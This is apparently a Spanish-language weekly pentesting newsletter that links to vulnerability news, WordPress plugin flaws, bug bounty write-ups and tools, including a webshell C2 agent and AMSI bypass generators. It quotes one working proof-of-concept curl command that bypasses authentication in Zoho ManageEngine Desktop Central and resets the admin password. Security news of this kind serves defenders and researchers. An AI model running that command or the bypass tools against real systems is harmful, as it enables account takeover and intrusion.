Pentest Planet #1 - Bug Bounty Methodology , Vulnerabilidades en Wordpress y VMWARE.

🐞 Bugs and 🧰 Tools

• HOW (NOT) TO LOOK FOR VULNERABILITIES IN JAVA APPLICATIONS

• VMWare Workspace One Access (CVE-2021-22056)

Revisa tu Wordpress! 3 plugins Vulnerables que podría afectar a 84.000 sitios Web.

• Login/Signup Popup (Inline Form + Woocommerce) version 2.3 

• Side Cart Woocommerce (Ajax) version 2.1

• Waitlist Woocommerce (Back in stock notifier) version 2.5.2

Mas información

Advisor

SRC-2022-0001 : Zoho ManageEngine Desktop Central StateFilter Arbitrary Forward Authentication Bypass Vulnerability

Disclosure Timeline:

• 2019-12-12 - Discovered and unreported

• 2021-12-03 - Patched by Zoho

• 2022-01-21 - Public release of advisory

Proof of Concept: curl -kb "STATE_COOKIE=&_REQS/_TIME/1337" "https://target.tld:8383/STATE_ID/1337/changeDefaultAmazonPassword?loginName=admin&newUserPassword=haxed" -d ""

Twitter

🧰 Tools

• NinjaC2 V2.1 : New webshell agent , more features and updated AV bypass - Shells.Systems.

• Nuclei - Vulnerability Scanner.

• Crea un contenedor de Docker con Android para pruebas de pentesting.

✅ 141 Templates nuevos

⭐ 22 Contribuidores únicos

🎯 Templates for proxy misconfiguration

🕸️ Web Hacks

• Entrenamiento gratuito, para pentesting web Web Security Academy

• API Security Checklist 

• Keyhacks revisa si las APIs expuestas son validas.

📓 Writeup Bounty

• 400$ Bounty using Google Dorks

• A 7500$ Google sites IDOR

• POST-based XSS

Algunos Checklist que pueden ser útiles en tu cacería de errores.

• Bug Bounty Checklist

• Bug Bounty account take over check list

⏪ Video Tutorial de la Semana

• JWTs - Patterns & Anti-patterns

🏠 Home

Las entradas que fueron creadas en el blog puedes darte una vuelta, si no viste ninguna.

• Winbindex: The Windows Binaries Index

• Boletin de Seguridad Informática cada Sabado en tu mail

• Hacking desde 0 aprendamos desde lo básico

• AMSI.Fail genera aleatoriamente diferentes bypass para AMSI.

• Hacking 101: Comprendiendo que es AMSI y como saltar el control

• Pentest Planet una Wiki de Contenido de Pentesting

• Resumen semanal II - en SniferL4bs

Nos vemos el próximo sábado con PENTEST PLANET.

Un saludo. Jose